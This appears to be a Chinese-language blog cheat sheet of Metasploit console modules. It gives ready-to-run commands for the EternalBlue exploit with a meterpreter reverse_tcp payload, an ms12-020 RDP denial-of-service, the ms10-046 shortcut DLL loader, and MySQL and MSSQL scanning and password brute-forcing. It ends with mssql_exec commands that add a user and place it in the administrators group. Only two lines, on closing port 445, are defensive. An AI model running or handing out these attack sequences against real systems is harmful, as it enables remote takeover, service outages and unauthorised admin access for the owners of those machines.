msfconsol中的部分模块

永恒之蓝(ms17-010):

[445端口开启]

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost ip

run

防御:
关闭445端口smb服务(网络共享服务)
开启防火墙,设置445端口处的入站规则连接

 

 


蓝屏攻击(ms12-020):

[3389端口开启]

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set rhost ip

run

 

 

 


文件共享(ms10-046):

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set srvhost kaliip

run

 

 


mysql暴力登录:

探测:

use auxiliary/scanner/mysql/mysql_version

set rhosts ip

run


登录:

use auxiliary/scanner/mysql/mysql_login

set rhosts ip

set pass_file  password.txt

set user_file user.txt

run

 

 

 

mssql:

查找mssql端口:

use auxiliary/scanner/mssql/mssql_ping

set rhost ip

run


(也可以用nmap -sV ip,但是效果不行)


mssql暴力破解:

use auxiliary/scanner/mssql/mssql_login

set rhost ip

set pass_file password.txt

set rport x

run

 

mssql命令执行(添加账户):

use auxiliary/admin/mssql/mssql_exec

set rhost ip

set rport

set cmd cmd.exe /c net user test 123 /add

run

set cmd cmd.exe /c net localgroup administrators test /add

run
上一篇:Mysql 身份认证绕过漏洞(CVE-2012-2122)


下一篇:2021-02-20信息收集和穷举篇